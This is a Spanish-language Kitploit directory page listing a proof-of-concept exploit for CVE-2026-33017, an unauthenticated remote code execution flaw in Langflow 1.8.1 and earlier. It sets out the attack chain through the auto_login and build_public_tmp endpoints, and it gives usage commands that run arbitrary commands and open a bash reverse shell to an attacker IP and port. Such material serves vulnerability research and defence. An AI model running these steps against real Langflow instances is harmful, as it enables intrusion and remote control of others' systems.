Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-33017-Langflow-RCE-PoC — La vulnerabilidad en Langflow 1.8.1 y versiones anteriores permite que un atacante remoto no autenticado logre la ejecución arbitraria de comandos en el host. | Kitploit
Herramientas/GitHubGitHub/omer-efe-curkus/cve-2026-33017-langflow-rce-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubomer-efe-curkus/cve-2026-33017-langflow-rce-poc

CVE-2026-33017-Langflow-RCE-PoC

La vulnerabilidad en Langflow 1.8.1 y versiones anteriores permite que un atacante remoto no autenticado logre la ejecución arbitraria de comandos en el host.

Ver Repositorio
17hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-33017-Langflow-RCE-PoC

La vulnerabilidad en Langflow 1.8.1 y versiones anteriores permite a un atacante remoto no autenticado lograr la ejecución arbitraria de comandos en el host.

Descripción

El endpoint POST /api/v1/build_public_tmp/{flow_id}/flow permite a cualquier persona construir flujos públicos sin autenticación.

Al proporcionar el parámetro opcional data, un atacante puede sobrescribir el flujo almacenado con su propia definición manipulada, incrustando código Python arbitrario dentro de las configuraciones de nodos. Este código controlado por el usuario se ejecuta mediante exec() sin sandboxing ni validación, lo que conduce a la ejecución remota de código no autenticada.

Versiones afectadas

root@kitploit:~
Langflow 1.8.1 y versiones anteriores

Características

  • Crear un flujo público si AUTO_LOGIN=true
  • Ejecución del exploit: Ejecutar comandos arbitrarios.
  • Reverse Shell: Iniciar una reverse shell basada en bash.
  • Requisitos previos

    • La instancia de Langflow objetivo tiene al menos un flujo público (común en demos, chatbots o flujos de trabajo compartidos)
    • El UUID de un flujo público (se puede obtener de enlaces/URLs compartidos)
    • No se requiere autenticación

    Cuando AUTO_LOGIN=true (configuración predeterminada), un atacante no autenticado puede cumplir todas las condiciones:

    • GET /api/v1/auto_login → obtener un token de superusuario
    • POST /api/v1/flows/ → crear un flujo público
    • Activar el exploit mediante build_public_tmp sin ninguna autenticación

    Uso

    root@kitploit:~
    python cve-2026-33017.py <host> [opciones]
    

    Opciones:

    root@kitploit:~
    -p PORT, --port PORT: Puerto SSH (predeterminado: 7860)
    
    -id FLOW_ID, --flow_id FLOW_ID: ID del flujo público (se creará uno nuevo si se omite)
    
    -c COMMAND, --command COMMAND: Comando personalizado a ejecutar
    
    --shell: Iniciar una reverse shell
    
    --lhost LHOST: IP del atacante para la reverse shell
    
    --lport LPORT: Puerto del atacante para la reverse shell (predeterminado: 4444)
    
    -t TIMEOUT, --timeout TIMEOUT: Tiempo de espera de conexión en segundos (predeterminado: 5)
    

    Ejemplos:

    Ejecutar un comando:

    root@kitploit:~
    python cve-2026-33017.py 127.0.0.1 -c 'touch /tmp/pwned.txt'
    

    Iniciar una reverse shell:

    root@kitploit:~
    python cve-2026-33017 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444
    

    Referencias

    Aviso de GitHub

    NVD CVE-2026-33017

    Medium

    ⚠️ Aviso legal

    Este PoC es solo para fines educativos y de investigación. Úsalo bajo tu propio riesgo. El autor no es responsable de ningún uso indebido o daño causado.

    Descargar herramienta